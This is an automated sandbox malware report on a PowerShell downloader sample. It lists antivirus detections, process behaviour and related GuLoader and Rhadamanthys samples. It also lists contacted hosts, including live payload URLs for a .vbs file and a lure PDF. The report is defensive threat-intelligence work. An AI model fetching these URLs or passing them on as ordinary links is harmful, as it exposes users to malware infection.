      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578221 Sample: 2rTi9MgX25.ps1 Startdate: 19/12/2024 Architecture: WINDOWS Score: 84 26 x1.i.lencr.org 2->26 28 www.bluemaxxlaser.com 2->28 30 3 other IPs or domains 2->30 38 Antivirus / Scanner detection for submitted sample 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 Yara detected Powershell download and execute 2->42 44 3 other signatures 2->44 9 powershell.exe 16 23 2->9         started        13 svchost.exe 2->13         started        signatures3 process4 dnsIp5 32 www.bluemaxxlaser.com 203.175.174.69, 49723, 80 SGGS-AS-APSGGSSG Singapore 9->32 34 astenterprises.com.pk 107.161.23.150, 443, 49712 RAMNODEUS United States 9->34 46 Powershell creates an autostart link 9->46 15 powershell.exe 23 9->15         started        18 Acrobat.exe 18 73 9->18         started        20 conhost.exe 9->20         started        36 127.0.0.1 unknown unknown 13->36 signatures6 process7 signatures8 48 Loading BitLocker PowerShell Module 15->48 22 AcroCEF.exe 105 18->22         started        process9 process10 24 AcroCEF.exe 22->24         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      2rTi9MgX25.ps134%ReversingLabsScript-PowerShell.Downloader.Boxter
      2rTi9MgX25.ps142%VirustotalBrowse
      2rTi9MgX25.ps1100%AviraTR/PShell.Dldr.VPA

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://www.astenterprises.com.pk/ms/List0%Avira URL Cloudsafe
      https://www.astenterprises.com.pk0%Avira URL Cloudsafe
      http://www.bluemaxxlaser.com/ms/ms.vbs0%Avira URL Cloudsafe
      http://www.bluemaxxlaser.com0%Avira URL Cloudsafe
      http://www.astenterprises.com.pk0%Avira URL Cloudsafe
      https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf0%Avira URL Cloudsafe
      http://astenterprises.com.pk0%Avira URL Cloudsafe
      http://www.blujlqmaxxlasjlqr.com/ms/ms.vbs0%Avira URL Cloudsafe
      https://www.astjlqntjlqrprisjlqs.com.pk/ms/List%20of%20rjlqquirjlqd%20itjlqms%20and%20sjlqrvicjlqs.p0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      bg.microsoft.map.fastly.net
      		199.232.210.172
      		truefalse
        		high
        astenterprises.com.pk
        		107.161.23.150
        		truefalse
          		high
          www.bluemaxxlaser.com
          		203.175.174.69
          		truefalse
            		high
            x1.i.lencr.org
            		unknown
            		unknownfalse
              		high
              www.astenterprises.com.pk
              		unknown
              		unknownfalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.bluemaxxlaser.com/ms/ms.vbsfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdffalse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1603217844.0000025F53817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1603217844.0000025F536D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1397153419.000001E34F6C5000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.8.drfalse
                    		high
                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://www.astenterprises.com.pk/ms/Listpowershell.exe, 00000001.00000002.1520565660.0000025F44C92000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://go.micropowershell.exe, 00000001.00000002.1520565660.0000025F44292000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1378720785.000001E340962000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1378720785.000001E3400D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1378720785.000001E33FF54000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.microsoft.copowershell.exe, 00000001.00000002.1622194811.0000025F5B900000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Licensepowershell.exe, 00000004.00000002.1397153419.000001E34F6C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/Iconpowershell.exe, 00000004.00000002.1397153419.000001E34F6C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000004.00000002.1378720785.000001E340962000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000009.00000003.1475779786.0000014B432D0000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drfalse
                                        		high
                                        http://crl.ver)svchost.exe, 00000009.00000002.2582093063.0000014B43400000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.blujlqmaxxlasjlqr.com/ms/ms.vbspowershell.exe, 00000001.00000002.1520565660.0000025F43892000.00000004.00000800.00020000.00000000.sdmp, 2rTi9MgX25.ps1true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.astjlqntjlqrprisjlqs.com.pk/ms/List%20of%20rjlqquirjlqd%20itjlqms%20and%20sjlqrvicjlqs.ppowershell.exe, 00000001.00000002.1520565660.0000025F44C92000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://go.microspowershell.exe, 00000004.00000002.1378720785.000001E3400D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.astenterprises.com.pkpowershell.exe, 00000001.00000002.1520565660.0000025F4514F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.adobe.coReaderMessages.6.drfalse
                                                		high
                                                http://astenterprises.com.pkpowershell.exe, 00000001.00000002.1520565660.0000025F4514F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://crl.mpowershell.exe, 00000001.00000002.1623669189.0000025F5BA79000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://g.live.com/odclientsettings/Prod1C:qmgr.db.9.drfalse
                                                    		high
                                                    https://www.astenterprises.com.pkpowershell.exe, 00000001.00000002.1520565660.0000025F44C92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1520565660.0000025F4514B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.1378720785.000001E33F878000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.bluemaxxlaser.compowershell.exe, 00000001.00000002.1520565660.0000025F451A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1520565660.0000025F451E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://contoso.com/powershell.exe, 00000004.00000002.1397153419.000001E34F6C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1603217844.0000025F53817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1603217844.0000025F536D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1397153419.000001E34F6C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://aka.ms/pscore68powershell.exe, 00000001.00000002.1520565660.0000025F43661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1378720785.000001E33F651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1520565660.0000025F43661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1378720785.000001E33F651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              203.175.174.69
                                                              		www.bluemaxxlaser.comSingapore
                                                              		24482SGGS-AS-APSGGSSGfalse
                                                              107.161.23.150
                                                              		astenterprises.com.pkUnited States
                                                              		3842RAMNODEUSfalse

                                                              Private

                                                              IP
                                                              127.0.0.1

                                                              General Information

                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1578221
                                                              Start date and time:2024-12-19 12:43:14 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 5m 45s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:18
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:2rTi9MgX25.ps1
                                                              renamed because original name is a hash value
                                                              Original Sample Name:89e06f26911f39129d6fb9ed523e53c44804c96031924c4f2ee754a49dd278cf.ps1
                                                              Detection:MAL
                                                              Classification:mal84.evad.winPS1@20/59@5/3
                                                              EGA Information:Failed
                                                              HCA Information:
                                                              • Successful, ratio: 83%
                                                              • Number of executed functions: 5
                                                              • Number of non-executed functions: 0
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .ps1

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                              • Excluded IPs from analysis (whitelisted): 199.232.210.172, 23.218.208.137, 172.64.41.3, 162.159.61.3, 3.233.129.217, 3.219.243.226, 52.6.155.20, 52.22.41.97, 23.218.208.109, 23.195.61.56, 2.19.198.27, 23.32.239.65, 23.32.239.56, 184.30.20.134, 23.32.239.9, 23.32.238.74, 23.32.238.18, 13.107.246.63, 172.202.163.200
                                                              • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, time.windows.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
                                                              • Execution Graph export aborted for target powershell.exe, PID 7572 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 7796 because it is empty
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              06:44:20API Interceptor70x Sleep call for process: powershell.exe modified
                                                              06:44:33API Interceptor2x Sleep call for process: svchost.exe modified
                                                              08:14:35API Interceptor2x Sleep call for process: AcroCEF.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              203.175.174.69fs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                              • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                              ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                              • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                              FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                              • www.bluemaxxlaser.com/ms/ms.vbs
                                                              yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                              • www.bluemaxxlaser.com/ms/ms.vbs
                                                              0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                              • www.bluemaxxlaser.com/ms/ms.vbs
                                                              64Tgzu2FKh.exeGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                              • bluemaxxlaser.com/rh/rheu.bin
                                                              zp.exeGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                              • bluemaxxlaser.com/rh/rh.bin
                                                              eua.ps1Get hashmaliciousGuLoaderBrowse
                                                              • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                              zp.ps1Get hashmaliciousUnknownBrowse
                                                              • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                              zk.ps1Get hashmaliciousUnknownBrowse
                                                              • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                              107.161.23.150tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                  yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                    0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                      List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                        List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                          List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                            List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                              List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                xw0K5Lahxz.exeGet hashmaliciousUnknownBrowse

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  www.bluemaxxlaser.comfs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 203.175.174.69
                                                                                  ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 203.175.174.69
                                                                                  FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 203.175.174.69
                                                                                  yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 203.175.174.69
                                                                                  0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 203.175.174.69
                                                                                  eua.ps1Get hashmaliciousGuLoaderBrowse
                                                                                  • 203.175.174.69
                                                                                  zp.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 203.175.174.69
                                                                                  zk.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 203.175.174.69
                                                                                  mx.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 203.175.174.69
                                                                                  as.ps1Get hashmaliciousGuLoaderBrowse
                                                                                  • 203.175.174.69
                                                                                  bg.microsoft.map.fastly.netLFLtlBAuf7.exeGet hashmaliciousQuasarBrowse
                                                                                  • 199.232.210.172
                                                                                  FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 199.232.210.172
                                                                                  yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 199.232.214.172
                                                                                  0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 199.232.210.172
                                                                                  Dix7g8PK1e.pdfGet hashmaliciousUnknownBrowse
                                                                                  • 199.232.210.172
                                                                                  CROC000400 .pdfGet hashmaliciousUnknownBrowse
                                                                                  • 199.232.210.172
                                                                                  contract_signed.pdfGet hashmaliciousUnknownBrowse
                                                                                  • 199.232.214.172
                                                                                  T.T_Copy.12.18.2024.exeGet hashmaliciousArrowRATBrowse
                                                                                  • 199.232.214.172
                                                                                  22054200882739718047.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                  • 199.232.214.172
                                                                                  Sh2uIqqKqc.exeGet hashmaliciousCryptbotBrowse
                                                                                  • 199.232.214.172

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  RAMNODEUStmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                  • 107.161.23.150
                                                                                  FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 107.161.23.150
                                                                                  yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 107.161.23.150
                                                                                  0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 107.161.23.150
                                                                                  List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                  • 107.161.23.150
                                                                                  List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                  • 107.161.23.150
                                                                                  List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                  • 107.161.23.150
                                                                                  List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                  • 107.161.23.150
                                                                                  List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                  • 107.161.23.150
                                                                                  owari.x86.elfGet hashmaliciousUnknownBrowse
                                                                                  • 168.235.88.56
                                                                                  SGGS-AS-APSGGSSGfs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 203.175.174.69
                                                                                  ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 203.175.174.69
                                                                                  FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 203.175.174.69
                                                                                  yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 203.175.174.69
                                                                                  0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 203.175.174.69
                                                                                  teste.x86.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                  • 103.14.247.60
                                                                                  na.elfGet hashmaliciousGafgytBrowse
                                                                                  • 103.14.247.29
                                                                                  na.elfGet hashmaliciousGafgytBrowse
                                                                                  • 103.14.247.60
                                                                                  jZ6ejWIrSV.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                  • 103.14.247.64
                                                                                  IGvLaRmr0J.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                  • 103.14.247.58

                                                                                  JA3 Fingerprints

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  3b5074b1b5d032e5620f69f9f700ff0efs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 107.161.23.150
                                                                                  1AqzGcCKey.exeGet hashmaliciousQuasarBrowse
                                                                                  • 107.161.23.150
                                                                                  v4BET4inNV.vbsGet hashmaliciousGuLoaderBrowse
                                                                                  • 107.161.23.150
                                                                                  ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                                  • 107.161.23.150
                                                                                  BJtvb5Vdhh.exeGet hashmaliciousQuasarBrowse
                                                                                  • 107.161.23.150
                                                                                  HquJT7q6xG.exeGet hashmaliciousQuasarBrowse
                                                                                  • 107.161.23.150
                                                                                  hKvlV6A1Rl.exeGet hashmaliciousQuasarBrowse
                                                                                  • 107.161.23.150
                                                                                  kqeGVKtpy2.exeGet hashmaliciousQuasarBrowse
                                                                                  • 107.161.23.150
                                                                                  LFLtlBAuf7.exeGet hashmaliciousQuasarBrowse
                                                                                  • 107.161.23.150
                                                                                  O9MV0lNEO5.exeGet hashmaliciousQuasarBrowse
                                                                                  • 107.161.23.150

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):1310720
                                                                                  Entropy (8bit):0.7067398985040838
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vq1:2JIB/wUKUKQncEmYRTwh05
                                                                                  MD5:D2C824B67FE814E48F5E5EC6BA065DDB
                                                                                  SHA1:F73026A621A8CF9FC192FB2CC557E8D5A5DCE3DE
                                                                                  SHA-256:E30DF985A47DEBA4CD829949CA8A600021603C2BF9BC97F324FF1643B76D6804
                                                                                  SHA-512:8F17AA1293654D6544EFA5FFE3258ED6942A878C40F385C9A0BD9124A9F70FE860C879C7F8B6E8A94CD4AA303EB8F590348E18078DE947696EC4D87E85B2D326
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x359b2b3d, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                  Category:dropped
                                                                                  Size (bytes):1310720
                                                                                  Entropy (8bit):0.7900383425452844
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:aDASB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+D:DazaPvgurTd42UgSii
                                                                                  MD5:8E27234EB3E7D561D2142976BB968A0C
                                                                                  SHA1:B521AD072263958537E67DF23B717F37B52A063D
                                                                                  SHA-256:5D11FF120A3F99E21D59E367A6AA91A5E977897D3218A07EA099C77BF1FE95C9
                                                                                  SHA-512:3BC31FFB6A25F355939304BB97EB982A414F0FC481C623D86104CAE4BE721B51879A00FE275434E3D55B88413B951E71ACC29C7B0B963B76ABEDDE3124C7C832
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:5.+=... ...............X\...;...{......................0.`.....42...{5.!,...|9.h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{....................................\.!,...|..................#...!,...|9..........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):16384
                                                                                  Entropy (8bit):0.08230096917654028
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:p+KYezjcvxzeqt/57Dek3JcKEg2cv/YllEqW3l/TjzzQ/t:MKzzszPR3t7EgjImd8/
                                                                                  MD5:5BB2617F9E71BF94A913D3F0DCCE519F
                                                                                  SHA1:503A556455E5E7FAFECEA602913C604071675954
                                                                                  SHA-256:38AB16E0E2BCC6F590977B866FBAA3248646BEF97A507BA2926A5AFE72F352C7
                                                                                  SHA-512:61B6F49CF4777D045AACFBA5900EA371F573A6F9B770A5D527D51601B3AC12338F88CF8C760DF2620A9BB5449D010765C197C8A154EF1702D7FDE550177837E9
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:I.......................................;...{..!,...|9.42...{5.........42...{5.42...{5...Y.42...{59................#...!,...|9.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):300
                                                                                  Entropy (8bit):5.22209574423176
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:7PrXFUAyq2PcNwi2nKuAl9OmbnIFUt8OPrRFH1Zmw+OPr+RkwOcNwi2nKuAl9Omt:7PrXuAyvLZHAahFUt8OPrjV/+OPr+R5h
                                                                                  MD5:CA522670EDD91A4B061444C17F186881
                                                                                  SHA1:039D2FA20374313B17E4C483FEF47CFFAD5344B0
                                                                                  SHA-256:F45028B55C92ED0F61353B54F381CB4092C5DF55E3EC690E523B7CAF9844E1AD
                                                                                  SHA-512:CF4A23108A3DF7DDA93562AE98E1C084AF22C1B358EA01DE8F0599ED4F472AB3E87E3C35DEBA3FB542BE22F809D4A5F79439C7A7EF28DD413E7615762CDA9DC4
                                                                                  Malicious:false
                                                                                  Preview:2024/12/19-06:44:33.062 1be4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:44:33.064 1be4 Recovering log #3.2024/12/19-06:44:33.065 1be4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):300
                                                                                  Entropy (8bit):5.22209574423176
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:7PrXFUAyq2PcNwi2nKuAl9OmbnIFUt8OPrRFH1Zmw+OPr+RkwOcNwi2nKuAl9Omt:7PrXuAyvLZHAahFUt8OPrjV/+OPr+R5h
                                                                                  MD5:CA522670EDD91A4B061444C17F186881
                                                                                  SHA1:039D2FA20374313B17E4C483FEF47CFFAD5344B0
                                                                                  SHA-256:F45028B55C92ED0F61353B54F381CB4092C5DF55E3EC690E523B7CAF9844E1AD
                                                                                  SHA-512:CF4A23108A3DF7DDA93562AE98E1C084AF22C1B358EA01DE8F0599ED4F472AB3E87E3C35DEBA3FB542BE22F809D4A5F79439C7A7EF28DD413E7615762CDA9DC4
                                                                                  Malicious:false
                                                                                  Preview:2024/12/19-06:44:33.062 1be4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:44:33.064 1be4 Recovering log #3.2024/12/19-06:44:33.065 1be4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                                  Download File
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):341
                                                                                  Entropy (8bit):5.25516706424098
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:7PlUVq2PcNwi2nKuAl9Ombzo2jMGIFUt8OPlR80gZmw+OPlRAIkwOcNwi2nKuAlx:7PWvLZHAa8uFUt8OPLM/+OPXD54ZHAaU
                                                                                  MD5:BBD7E9F8BB6003846AF63200AA406636
                                                                                  SHA1:AE62A49978A47DE3DFB0E46814BB4AAD369B781B
                                                                                  SHA-256:1309C6BB4822F48C3E25EE7F82AE669A57CFCF445688BED52D1CD421D5393EF2
                                                                                  SHA-512:1DA39A9626F1353EB56C320A5038CDC36399D4408A819B9380BDDE8AD5723D4596B5470A8D7A79500BF2C7DE7C3E62ECE64A9D24CE92613AA30364A7ABC77694
                                                                                  Malicious:false
